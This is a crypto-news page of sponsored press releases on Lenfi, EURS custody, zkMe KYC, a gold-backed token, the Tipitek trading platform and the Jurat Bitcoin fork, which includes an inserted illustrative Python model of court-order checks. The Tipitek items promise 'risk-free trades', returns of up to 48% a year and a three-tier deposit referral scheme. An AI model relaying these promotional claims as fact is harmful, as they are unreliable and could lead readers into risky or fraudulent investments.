This should be a lesson to all of us and a wake-up call to businesses relying on third-party software. Do not automatically trust the code running on your systems. Neither a good-looking website, nor a solid company profile, nor digital certificates guarantee the absence of backdoors. Trust has to be earned and proven. Stay safe!

Previous ArticleNext Article

Lenfi reinforces trust with a second audit prior to mainnet launch 6223

In a move that underscores its commitment to unmatched security and transparency, Lenfi, a trailblazer in Cardano’s DeFi landscape, has announced the commencement of its second audit, paving the way for its much-anticipated mainnet debut. The upcoming six-week audit, conducted by industry experts TxPipe, marks a significant milestone in ensuring top-notch security for Lenfi’s innovative lending and borrowing protocol.

Simplifying DeFi: Lenfi’s user-centric approach

Lenfi stands out in the complex world of decentralized finance (DeFi) by making its lending and borrowing platform not only secure but also user-friendly. “Our goal is to demystify DeFi, making it accessible and safe for everyone,” says Mantas Andriuska, Co-founder of Lenfi. “This audit is more than a security check; it’s about building trust and delivering a seamless experience to our users.”

Building on a foundation of success

The decision to conduct a second audit follows the successful completion of an initial audit by AnastasiaLabs, which involved an in-depth review and optimization of Lenfi’s code. This rigorous process helped fortify Lenfi’s platform against potential vulnerabilities, setting a high standard in the DeFi sector.

In 2022, under its former name Aada Finance, the team’s commitment to robust security protocols was evident with two comprehensive audits by Vacuumlabs. Since its launch on September 13, 2022, Lenfi’s V1 lending protocol has operated flawlessly, a testament to the team’s meticulous approach.

What sets Lenfi apart?

Lenfi distinguishes itself in the DeFi space with its unwavering commitment to safety and its open-source approach. Transitioning from a peer-to-peer model to a complex pooled lending system on Cardano, Lenfi underscores its dedication to security and transparency. This open-source philosophy not only ensures rigorous scrutiny but also fosters community trust and ongoing innovation in DeFi.

Enhancing user confidence through expert audits

Recognizing that a single audit is not the be-all and end-all of security, Lenfi adopts a multi-audit strategy. “Multiple audits mean diverse expert perspectives, leading to a more resilient platform,” Andriuska explains. TxPipe, as creators of the programming language used in Lenfi’s smart contracts, are uniquely positioned to provide comprehensive and insightful stress tests.

Looking ahead: A safer DeFi future

This second audit is more than a procedural step; it’s a reflection of Lenfi’s vision for a safer, more reliable DeFi ecosystem. As we move closer to the mainnet launch, Lenfi’s unwavering commitment to security, coupled with its innovative platform, positions it as a beacon of trust and efficiency in the dynamic world of DeFi.

Website: https://lenfi.io/
Twitter: https://twitter.com/LenfiOfficial
Testnet: https://testnet.lenfi.io/

Hex Trust Enables Custody For STASIS EURO (EURS) Stablecoin 5717

STASIS, the European fintech company behind the oldest EURO stablecoin EURS, announced the new integration with recognized digital asset custodian Hex Trust today. This integration enables Hex Trust to offer custodial services with EURS to its clients and reinforces Hex Trust’s ambition to diversify its digital assets offering.

Effective immediately, Hex Trust will allow its clients to safely store and manage EURS assets via their Hex Trust Custody solution. “We believe that this integration highlights the growing significance of EURS within the stablecoin realm. Major cryptocurrency players expect the demand for non-USD stablecoins to grow, and at STASIS, we strongly align with these predictions. This integration is a proof of that as our partnership with Hex Trust bolsters the expansion of the EURS Network, which brings together a diverse blend of crypto exchanges, DEXs, wallets, fiat on/off ramps, and various other services. We’re excited to team up with Hex Trust and enable top-tier EURS custody to Hex’s enterprise clients,” said Gregory Klumov, CEO at STASIS.

“The decision to onboard EURS aligns seamlessly with our vision and signifies another milestone for Hex Trust. By offering our 200+ institutional clients the ability to use EURS within our secure custody platform, Hex Safe, we reinforce our position as a trusted provider of comprehensive digital asset solutions. This partnership with STASIS highlights our commitment to meeting the evolving needs of our clients and addressing the growing demand for non-USD stablecoins. We are looking forward to providing top-tier EURS custody and contributing to the continued growth of the digital asset ecosystem,” said Giorgia Pellizzari, Head of Custody at Hex Trust.

EURS by STASIS is the oldest and the only fully compliant and regulated EURO stablecoin on the market with a 5-year track record, over 6B euros transferred on-chain across 5 major blockchains (more distributed ledgers planned), including Ethereum, Polygon, XRP, XDC and Algorand. With zero transaction failures and regular audits by BDO Malta, EURS stands out with its pristine regulatory and compliance status. All EURS assets are backed on a 1:1 basis, and collateral is stored at the Central Bank, mitigating commercial banking risks.

About Hex Trust

Established in 2018, Hex Trust is a fully licensed digital asset custodian dedicated to providing solutions for protocols, foundations, financial institutions, and the Web3 ecosystem. Get access to custody, DeFi, brokerage, and other services built on regulated infrastructure. Hex Trust has offices in Hong Kong, Singapore, Vietnam, Dubai, France and Italy.

About STASIS & EURS

STASIS is a European financial technology firm that develops customer-friendly instruments to enable institutional and retail customers to manage digital currencies and public blockchains for payments and settlements, e-commerce, and DeFi. The company issues, governs, and manages EURS, the only legal stablecoin in the EU, accessible in 175 countries and audited by BDO, one of the most renowned auditors in the world.

Alchemy Pay and zkMe – Transforming KYC With zkMe’s Innovative zkKYC Solution to Provide Privacy-Preserving and Compliant Onboarding

Alchemy Pay and zkMe team up to bring groundbreaking privacy-preserving KYC solutions to onboard users in a compliant, safe and secure manner through the zkMe identity oracle.

Overview

  • zkMe is an end-to-end zk proof and decentralized identity oracle
  • Alchemy Pay will start accepting zkMe’s privacy-preserving KYC, AML, and compliance related onboarding services
  • Through this collaboration, the two companies prove it’s possible to merge the blockchain ethos of privacy and decentralization with incoming regulation

Despite the maturity of the internet and the awareness of privacy concerns, existing KYC solutions often impose archaic and risky procedures on users: procedures that expose the user’s information to employees and companies (such as easily accessible pictures of passports), while users have no control over how their data is shared with third parties. The repetitive verification required across different platforms only exacerbates data exposure risks.

With zkMe providing an identity oracle, which treats each identity as a set of anonymized data points, all identity-based queries (from personal info such as KYC, to on and offline credentials such as medical licenses and social media prowess) can be packaged in a single oracle, privately.

Traditional KYC methods often create friction during onboarding, sacrifice user privacy, and impose security risks by storing personal data on centralized servers. As a leading payments gateway bridging fiat and crypto economies globally, Alchemy Pay is teaming up with zkMe to integrate cutting-edge zero-knowledge proof (ZKP) technology into its onboarding process. This collaboration will provide enhanced privacy, security and convenience for Alchemy Pay users worldwide.

How zkMe’s zkKYC innovates identity verification

zkMe’s zkKYC solution allows users to prove they meet verification criteria without exposing any personal information. Advanced cryptography converts identity data into anonymized proofs of the credential, which are then validated against predefined requirements. The KYC process then only reveals that the users meet the criteria, such as “is this user over 18,” and “which country is this user a citizen of,” without risking crucial information such as the picture of the passport, or the passport number, all while being compliant in most key jurisdictions.

The process ensures:

  • User privacy is safeguarded through end-to-end encryption and selective disclosure of information. No personal data is ever stored on centralized servers.
  • Security is bolstered by decentralizing computation and using threshold encryption across multiple parties. No single entity can access user data.
  • Regulatory compliance is maintained by enabling identity recovery if required by authorities.
  • Convenience is improved by enabling instant verifications that can be reused across services that deploy zkMe’s identity oracle. No more repetitive KYC processes.

By adopting zkKYC, Alchemy Pay reaffirms its commitment to user security and privacy. This integration paves the way for a more streamlined, trusted and regulatory-compliant onboarding experience.

Looking ahead, zkKYC opens up new possibilities for Alchemy Pay to expand its services while upholding privacy values. Potential use cases include permissioned DeFi, undercollateralized loans, loyalty programs, and more. By leveraging advanced cryptography, Alchemy Pay can cater to emerging Web3 markets while giving users control over their personal data. This collaboration with zkMe represents a monumental step towards the future of self-sovereign identity.

About zkMe

zkMe builds zk Identity Oracles for truly decentralized & anonymous cross-chain credential verifications.

No personal information is ever processed by anyone but the user themselves. Data leaks & misuse by the service provider are impossible; full interoperability & reusability result in a superior ID solution. zkMe is the only FATF-compliant KYC provider to be fully decentralized, offering a full suite of products from anti-bot/anti-sybil to KYC and more.

Apraemio: A Gold-Backed Cryptocurrency Project Gains Validation as HSBC Enters the Gold Tokenization Space

Apraemio, a unique digital asset backed by gold, today announced that its exchange listing will be concluded by 2024, and the gold redemption programme will start by 2025.

“We are thrilled to see HSBC enter the gold tokenization space, as this further validates our belief that gold-backed cryptocurrencies are the future of asset-backed tokens,” said Dr. Zoltán Varga, CEO of Apraemio. “Our project is built on a strong foundation of trust and transparency, and we are proud to be at the forefront of this emerging industry.”

Apraemio is a gold-backed cryptocurrency project supported by its mother company, which owns 65 sq km of land in Mali, Africa. The conglomerate company, GGS, holds exclusive rights to mine one of the largest gold reserves in Mali, and it is committed to using blockchain technology to provide investors with a secure and transparent way to invest in gold.

“We are committed to providing investors with a reliable store of value in a world of volatile cryptocurrencies; that is pretty much what we have been doing in the last 15 years,” said Dr Varga, the CEO of one of the most renowned investment gold companies – called Arteus Capital – in the Central European region, which has been active in the market for over a decade.

The Apraemio project is currently in the pre-sale phase, and the company plans to list its tokens on major cryptocurrency exchanges in 2024. The project also includes launching a gold redemption programme and opening a small-scale mine on its roadmap for the following year.

“We are excited to share this news with the world and look forward to bringing Apraemio to market,” said Dr. Zoltan Varga. “We believe that our project has the potential to revolutionize both the gold and cryptocurrency market and provide everyone with a new and inclusive way to invest in this precious metal.”

About Apraemio

Apraemio is a gold-backed cryptocurrency project combining the best of both worlds – the heritage, stability and popularity of gold and blockchain technology’s innovation and financial freedom. The company holds exclusive rights to mine one of the largest gold reserves in Mali, Africa, and is committed to using blockchain technology to provide investors with a secure and transparent way to invest in gold.

Tipitek is expanding the capabilities for its clients

Tipitek

Tipitek is a structural division of Cryptoves LLP with its own high-speed, reliable, and modern cryptocurrency platform. Since its launch, the entire Tipitek ecosystem has been continuously evolving, providing a reliable platform for working in the crypto industry. While there were previous announcements about expanding the range of tools, not all details were previously disclosed. As of today, Tipitek offers the opportunity to work not only with cryptocurrencies but also with tokenized stocks, indices, precious metals, commodities, and energy assets.

About Tipitek: Analyzing Tipitek’s operations, it can confidently be said that its creators have successfully combined the best elements: innovation, style, comfort, security, multifunctionality, stability, high speed, and more. Both beginners and experienced traders enjoy working here, as each sees benefits for themselves.

Tipitek offers several types of trading accounts, and the use of margin trading conditions allows for trading on growth.

Expansion of the Instrument List: This management decision now allows Tipitek clients to work with cryptocurrencies and other tokenized assets, stocks, indices, precious metals, commodities, and energy assets on a single platform. This significantly simplifies the life of an active trader and saves time. And we know that time plays a very important role in the lives of our clients.

So, Tipitek users can now trade:

  • Cryptocurrency pairs (crypto-USDT, crypto-crypto): Over 30 directions for trading bitcoins, stablecoins, altcoins. Flexible leverage.
  • Tokenized stocks: Over 150 positions of well-known global companies. Short-term and long-term strategies are available.
  • Tokenized indices: Availability of the most popular global trends. Compliance with underlying assets. Market turnover of over 1 trillion dollars per day.
  • Tokenized precious metals: The inclusion of tokenized metals is a sound addition, as investments in precious metals are a classic choice for every investor.
  • Tokenized commodities: An impressive list of available tokenized goods (corn, wheat, beans, etc.). Compliance with all Chicago Mercantile Exchange quotations.
  • Tokenized energy assets: A rather bold decision, as tokenized energy assets are mainly dealt with by bold and experienced traders who know how to take risks. However, at the same time, it is an excellent way to earn effectively.

Thus, the development of Tipitek’s trading division is moving in the right direction. And against the backdrop of similar projects that started their activities around the same time as Tipitek, competitive advantages are clearly visible. Expanding the list of instruments is an excellent solution for further advancement, which will help attract new users and increase the opportunities for each active client, offering 6 types of trading accounts.

Tipitek represents a revolutionary milestone in the cryptocurrency industry. The company seamlessly integrates all the essential elements required for convenient and profitable cryptocurrency trading.

Discover the unparalleled advantages, features, and account options that Tipitek offers. This is the first thing that catches the attention of prospective users of any platform. They are interested in the minimum investment amount, fees, availability of leverage, savings accounts, or other perks.

Cryptoves LLP has chosen not to limit Tipitek to one or two types of trading accounts and has provided its clients with a total of six unique account types, each offering new opportunities for users.

What do they offer you?

All six types of client accounts at Tipitek differ in the deposit amount and the set of useful services. The company explains the variety of account types by noting that platform users work not only with cryptocurrencies but also with other digital assets, making it an excellent decision.

MINI Account: A trading account with a minimum deposit of $500 and a minimum investment period of 180 days. Clients get the opportunity to use leverage up to 1:5, receive daily email newsletters, request consultations with the company analyst, and access educational materials.

EASY START Account: A trading account with a minimum deposit of $5,000 and a minimum investment period of 180 days. Clients can use leverage up to 1:5, receive weekly email newsletters, weekly consultations with an analyst, one trading signal per week, and, upon request, get a personal manager and educational materials.

START+ Account: A trading account with a minimum deposit of $25,000 and an investment period starting from 180 days. It offers leverage up to 1:5, daily email newsletters with transaction history analysis, weekly consultations with an analyst, two trading signals per week, two risk-free trades, one built-in robot, and 1.5% interest on savings accounts. A personal manager and educational materials are available upon request.

PRO Account: A trading account with a minimum deposit of $100,000 and a minimum investment period of 90 days. Clients can work with leverage up to 1:10, receive weekly email newsletters, have four consultations per month with the company analyst, full support from a personal manager, up to five trading signals per week, and two built-in trading robots. Educational materials are available upon request, and savings accounts earn 2% interest.

PRO+ Account: Another trading account with a minimum deposit of $500,000 and a minimum investment period of 90 days. It offers leverage up to 1:10, six consultations per month with the company analyst, full support from a personal manager, up to ten trading signals per week, four risk-free trades, and two built-in trading bots. Educational materials can be requested. This account type includes a 2% interest rate on savings accounts.

EXTRA Account: A trading account with a minimum deposit of $1,000,000 and a minimum investment period of 90 days. Clients have unlimited possibilities, including leverage up to 1:20, weekly email newsletters, full support from the company analyst and a personal manager, an unlimited number of trading signals, access to automated trading, and six risk-free trades. Individual educational materials are available upon request, and savings accounts earn 4% interest.

What do they have in common?

All six trading accounts share the absence of commissions from Tipitek’s side and are denominated in cryptocurrency (BTC, USDT). When your deposit reaches the level corresponding to another account type, the opportunity to enjoy the benefits of that higher level opens up.

Tipitek goes beyond simple cryptocurrency exchange; it is the perfect comprehensive solution for traders, investors, and partners. Cryptoves LLP openly declares the advantages of Tipitek, attracting an increasing number of active clients. The new division is already quite popular among traders due to its multifunctionality and modernity.

Briefly about Tipitek: It is a structural division of Cryptoves LLP, whose activities began in 2017, initially specializing in cloud cryptocurrency mining. The company is legally registered in Singapore. The company’s leadership and team work closely together, resulting in rapid development and the creation of the Tipitek trading division with its own platform. Is Tipitek currently at the peak of its development? It’s challenging to say, as Cryptoves LLP has not stopped evolving since its inception.

What makes Tipitek notable? Tipitek offers advanced charts and several types of orders to active platform users. Cryptoves LLP’s management and team emphasize that Tipitek is characterized by:

High Speed and Stability: Users frequently note that transactions can be executed in microseconds, saving them time.

Security: Cryptoves LLP applies only verified and modern tools to ensure customer security, emphasizing that security and customer trust are always their top priorities.

Ability to Implement Trading Strategies: Developers have created a user-friendly interface, allowing both beginners and experienced traders and investors to implement trading strategies. Tipitek also provides a detailed order book overview and a choice of trading pairs.

Mobility: Cryptoves LLP acknowledges the need for traders to work from anywhere in the world at any time. Tipitek Trade is available for all mobile devices.

As we can see, Cryptoves LLP boldly emphasizes the advantages of its new product, as the company has taken into account the most critical aspects: price and time priority, simultaneous use of multiple order types, a dynamic maker-taker fee schedule based on trading volume.

Cryptocurrency platform Tipitek introduces an affiliate program as another way to earn

People interested in digital assets are likely familiar with the functionality, security, reliability, and modernity of Tipitek. It’s worth noting that Cryptoves LLP is rapidly progressing toward its goal, attracting more and more clients, including company founders and professional traders. The news of the affiliate program being introduced is already widely spreading on the Internet, so Tipitek can expect a new wave of interest in the platform.

What sparks interest in Tipitek? Primarily, clients can work not only with cryptocurrencies but also with other digital assets: tokenized stocks, indices, precious metals, commodities, and energy assets. This simplifies the work of traders, saving them time as there is no need to use multiple platforms simultaneously.

Despite the relatively recent emergence of the new division, it is safe to say that Tipitek is already a reliable, stable, and secure means of achieving the goals of traders and investors. Working with Tipitek is genuinely simple and comfortable.

Investors and traders can not only buy and trade digital assets but also store them. The Tipitek security system is at the highest level. Since the launch of Tipitek, Cryptoves LLP’s leadership has repeatedly stated in interviews that the company does not plan to stop here and will continue to develop and improve Tipitek. Based on the events happening in the company, it’s hard to argue with that. Tipitek is ahead in development compared to its peers and even many “veterans.”

How to earn with Tipitek? For Tipitek clients, there are classic ways to earn:

Profit from Trading: The trading platform’s uniqueness is characterized by highly favorable trading conditions, a wide variety of the most liquid financial instruments, the use of trading signals, and trading bots. Analytical and educational materials are also available to Tipitek clients.

Passive Income: This is a savings investment account service with an interest rate significantly exceeding that of banks. Interest payments can be made weekly. Depending on the chosen account type, Tipitek clients can earn up to 48% annually.

What does launching the Tipitek affiliate program give clients? It expands earning opportunities for Tipitek clients. The Tipitek affiliate program is a three-tier referral program that allows you to earn 3-7% of each deposit made by your referrals. To do this, you only need to register and obtain a referral link, which can be posted on social networks, thematic forums, etc.

The affiliate program can also be combined with passive income and trading, significantly increasing your earnings. Thus, joining the affiliate program on the platform is another additional opportunity to earn with Tipitek.

Jurat Launches Layer-1 Mined by Attorneys

A group of attorneys and blockchain engineers are building a new Bitcoin fork blockchain using an emerging legal enforcement protocol that bridges the blockchain to state and federal courts. Called Jurat, the protocol enables capabilities like freezing disputed coins or recovering stolen coins after a hack, all under the auspices of the justice system. The native coin of the new fork is called $JTC.

The primary objectives for the new blockchain are to ensure robust consumer protection for cryptocurrency users and provide on-chain enforcement for legal rights afforded in commercial transactions, property transfers, and the banking system.

The $JTC token is due to be listed on exchanges in the near future. At this time, $JTC mining is open for licensed attorneys in all jurisdictions and may be made available to legacy Bitcoin miners in the future.

Attorneys Line Up To Participate

To start the process for becoming a $JTC miner, attorneys should complete the mining information request form, available on Jurat’s website.

$JTC miners receive $JTC tokens as compensation for supporting the network and helping court rulings to execute on-chain. Mining with Jurat also offers attorneys the chance to become better acquainted with the technology underlying blockchain transactions and participate in a more legally compliant Web3.

Mining by Non-Attorneys

Mining applications for Jurat are currently open to licensed attorneys only. Jurat may expand to include legacy Bitcoin miners in the future.

How to obtain $JTC

$JTC forked at Bitcoin block height 717808, which occurred on January 8, 2022. All addresses that contained $BTC as of that block received $JTC at a 1:1 ratio to their $BTC and can claim the coins using the Jurat Wallet, which is available for Android (Play Store), iOS (App Store), Windows (Jurat.io), and Mac (Mac App Store).

Currently, $JTC cannot be bought on exchanges but will be listed soon.

Why Does Blockchain Need Jurat?

Jurat was founded by Mike Kanovitz, a partner at Loevy & Loevy in Chicago, USA, who works in Web3 and traditional civil litigation. He conceived of Jurat as a means to provide consumer protection in the crypto space after seeing many clients victimized by fraud and theft.

“Witnessing people lose their hard-earned savings to hackers and phishing scams only to be left with no legal recourse inspired me to create Jurat,” said Mike Kanovitz, Jurat CEO and co-founder.

After creating the protocol and proving that legal rights could be enforced on-chain without sacrificing the benefits of decentralization, Kanovitz recognized that the technology could help make blockchains safer and more usable for mainstream commercial transactions.

“Blockchain technology has the potential to benefit consumers and businesses in countless ways, but the absence of an effective layer for enforcing legal rights prevents it from achieving mainstream adoption,” he said.

The $JTC Bitcoin fork uses Jurat to offer the unique ability to recover digital assets and freeze accounts associated with illicit activities. The protocol can provide legal recourse for users without involving intermediaries or asset custodians while maintaining the full decentralization of the network. There are four steps to the process:

  1. A $JTC user who needs legal recourse because of on-chain crime, a mistaken transaction, or lost private keys can create a Jurat request ID through the Jurat UI. The Jurat ID is a string of characters that specifies the transaction the claimant wants the court to order, for example a transaction to send coins from a scammer’s wallet back to the true owner. Armed with the ID, the user can bring the matter to court.
  2. After filing a case, the user provides the ID to the court. If the judge agrees with the lawsuit, they signify this to Jurat blockchain nodes by including the ID in their written opinion and placing it on the court’s public docket.
  3. Once on the public docket, specialized nodes can access the court’s opinion and recognize the Jurat ID. The code informs the nodes that the judge has ruled and what transaction the judge has ordered.
  4. Each miner then verifies the court order, like verifying a private key signature. The process is automatic and does not require any intermediaries.
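A toy model of the four-step flow above, added here as an illustration and not Jurat's own code: the request-ID format, the docket representation, the trusted-court list and the verification rules are all assumptions. It shows the property a node needs from step 4, namely that an ID found on a docket only triggers the exact transaction the claimant originally requested, and nothing else.

```python
"""Constructed model of a court-docket-driven transaction order.

Assumptions (not Jurat's real protocol): an ID is a truncated SHA-256 of
a canonical encoding of the requested transaction; a docket entry is a
dict with the issuing court and the opinion text; nodes keep a list of
courts whose public dockets they trust.
"""
from __future__ import annotations

import hashlib
import json
import re
from dataclasses import asdict, dataclass

ID_PREFIX = "JURAT-"  # assumed ID format for this illustration


@dataclass(frozen=True)
class ProposedTx:
    action: str      # "transfer" or "freeze" (assumed vocabulary)
    from_addr: str
    to_addr: str     # empty for a freeze
    amount: int      # assumed integer units


def request_id(tx: ProposedTx) -> str:
    """Step 1: derive an ID that commits to exactly one ordered transaction.

    Because the ID is a hash of a canonical encoding, an opinion quoting
    it cannot be reused to authorise a different transaction.
    """
    canonical = json.dumps(asdict(tx), sort_keys=True, separators=(",", ":"))
    return ID_PREFIX + hashlib.sha256(canonical.encode()).hexdigest()[:16]


def find_ids_in_opinion(opinion_text: str) -> list[str]:
    """Step 3: a node scans a published opinion for embedded request IDs."""
    return re.findall(ID_PREFIX + r"[0-9a-f]{16}", opinion_text)


def verify_order(docket_entry: dict, pending: dict[str, ProposedTx],
                 trusted_courts: set[str]) -> list[ProposedTx]:
    """Step 4: accept an order only if it comes from a trusted docket and
    each quoted ID recomputes from a request the node already holds.

    Anything else (unknown court, ID with no matching claim, ID that does
    not recompute) is ignored rather than executed.
    """
    if docket_entry.get("court") not in trusted_courts:
        return []
    executed = []
    for rid in find_ids_in_opinion(docket_entry.get("opinion", "")):
        tx = pending.get(rid)
        if tx is None or request_id(tx) != rid:
            continue
        executed.append(tx)
    return executed


if __name__ == "__main__":
    # Constructed sample: a claimant asks for a freeze of a suspect wallet.
    freeze = ProposedTx("freeze", "addr-suspect-1", "", 0)
    rid = request_id(freeze)
    pending = {rid: freeze}
    opinion = f"... the Court ORDERS the relief identified as {rid} ..."
    docket = {"court": "constructed-court", "opinion": opinion}
    print(verify_order(docket, pending, {"constructed-court"}))
    # The same opinion from an untrusted source executes nothing.
    print(verify_order({**docket, "court": "unknown"}, pending, {"constructed-court"}))
```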

$JTC has already been used live in court. Recently, a US federal judge considered the cryptocurrency accounts of several sanctioned individuals, including a wallet belonging to North Korean state-sponsored hackers called the Lazarus Group. The court ordered the hackers’ accounts frozen, and the Jurat nodes executed the court orders automatically and seamlessly, preventing the hackers from spending the $JTC in the sanctioned accounts.

Building Legal3 With Jurat

The success of Jurat technology in the case brought against the Lazarus group and others is an early step in Jurat’s broader goal of introducing a legal base layer for every transaction in Web3.

Jurat will continue to add new attorneys to its mining operation as the $JTC launch date draws closer and encourages all attorneys who have a passion for justice on the blockchain to apply.